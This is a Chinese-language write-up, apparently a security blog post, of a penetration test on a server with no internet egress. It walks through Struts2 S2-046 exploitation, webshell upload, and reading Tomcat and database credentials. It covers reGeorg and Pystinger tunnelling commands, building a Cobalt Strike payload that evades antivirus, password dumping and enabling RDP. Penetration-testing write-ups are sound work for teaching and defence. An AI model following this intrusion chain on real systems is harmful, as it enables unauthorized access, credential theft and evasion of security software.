前言
周末时间中午吃饱喝足后,闲着无聊听着音乐,本想周末就这样悠闲的过的,怎么老输,开始键盘侠上线 ,没办法,人菜又瘾大。
S2-046打点
突然手机微信响了下,说有个测试,要开始干活。给一了个IP地址,先是进行一些日常的信息收集, 端口 系统的等, 密码弱口令测试,爆破等没有发现。
在谷哥查找历史中发现有个7080这个端口快照,去看看 浏览器打开回到页面发现了.action的,可以用下s2的漏洞试下可以用下s2的漏洞试下。
http://x.x.x.x:7080/xxxx.action。
存在漏洞的,命令执行一下,最高权限。
看下目录在那。
现在可以上传个木马上传先上把带有文件框的上传到服务器那
上传完成后再到浏览器打开这个页面进行你要上传的小马上传到服务器,路径那个把上面那个直接复制到那个路径里。
这里我测试了哥斯拉的马,能上传但连接不上。
后面又测试了Behinder 3.0 Beta_3 版本 也连接不上。
BehinderV3.0 B6据点
MMP的去看看Behinder的最新版本更新到那了,更新到6了,我还在用3。更新一波,再来过干他。
成功了,还是最新版本好用,以后要时常更新自己的工具啊。
接下来看看有什么东西,找找配置文件,目录下面这个。
Tomcat用户信息、密码等,数据库信息。
找了找,差不多了,然后看看下服务器上有没有安装杀毒软件等,命令运行tasklist。
可以看到是安装有360杀毒软件的,年轻人不讲武德,那我玩偷袭,要免杀。
查看了下目标还不出网,没开3389端口,这时候就要用到内网穿透工具了 ,也可以在cmd命令行,把3389开了。
不出网的上传cs马也返回不了,先把regeorg搞起来先。
使用regeorg进行反向代理
下载地址在https://github.com/sensepost/reGeorg,用法也有说明了,在这就不多讲了。
上传对应语言的脚本到目标服务器的网站目录下,比如你要上传的服务器用的jsp,你就上传jsp的。
可以看到上传成功了。
运行reGeorgSocksProxy.py,-p为指定隧道的端口,-u为刚刚上传的tunnel文件地址。
比如python reGeorgSocksProxy.py -p 10086 -u http://x.x.x.x/tunnel.jsp。
这样的目的是为了进入内网渗透,能连入内网搞事情。
本机开始运行程序,又出些问题,连不出去,后来去看了我的python,我安装有python2.7和python3.8,在想是不是起冲突了,我把python3.8的删除了,再试下,成了……
报错的:
正常的:
搞好一个到下一个,慢慢来。
Pystinger上线cs
通过webshell实现内网SOCK4代理,端口映射。
可直接用于metasploit-framework,viper,cobalt strike上线下载地址在这。
https://github.com/FunnyWolf/pystinger/releases用法:
建立在拿到的shell,有上传功能。
先上传工具到目标服务器上针对什么的web系统就用什么的脚本,我这里是jsp,那我就上传jsp。
上传成功后 访问下能访问不,当出现这个UTF-8就成功了。
回到shell这边 还要把一个上传上去。
stinger_server.exe。
将 stinger_server.exe上传到目标服务器 ,执行如下命令:
在cmd命令下输入 start 加目录下/stinger_server.exe 0.0.0.0 执行。
这里说明下,利用了连接在服务器进行了客户端进行连接我们的cs服务出网。
同时也要注意下不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连。
接下就是在vps执行stinger_client 这个工具(要是win系统就用exe)。
./stinger_client -w http://x.x.x.x:7080/proxy.jsp -l 0.0.0.0 -p 60000。
成功之后vps上面会返回 一个60020端口信息,ok。
到这里就完成了Pystinger上线的事了。
cobalt strike马免杀
接下来就是cs用法了这里要建立一个监听来监听内网的。
监听本地就好 端口号不要选择错了,用上面60020那个监听端口。
完成后搞个cs马做免杀,根据之前的进程查看可以看到是安装有360杀毒软件的,那就要免杀了,不然过不了杀软,这里我用zirikatu做了一个免杀。
下载地址 https://github.com/pasahitz/zirikatu.git
然后放到了C:/tmp/下面执行,像上传目录方面,程序运行时可能生成临时文件,所以上传的目录最好具有读写权限,如 C:WindowsTemp 是个选择。
运行看一看。
给我连!不出网上线成功。
cobalt strike上线
抓下密码。
密码抓出来。
我在这cs这开启3389 端口。
可以看到已经开启起来了。
reGeorg+Proxifier走起(https://www.freebuf.com/column/206524.html)。
连入我们刚刚抓到的密码上去。
看了下时间,点到为止,打完收工。
往期精彩
登陆页面的检测及渗透
渗透实战篇(一)
渗透测试信息收集的方法
常见Web中间件漏洞利用及修复方法
内网渗透 | 流量转发场景测试
Waf从入门到Bypass
实战渗透-看我如何拿下学校的大屏幕
技术篇:bulldog水平垂直越权+命令执行+提权
渗透工具实战技巧大合集 | 先收藏点赞再转发一气呵成
感兴趣的可以点个关注!!!
本文始发于微信公众号(安全先师):记一次不出网的测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论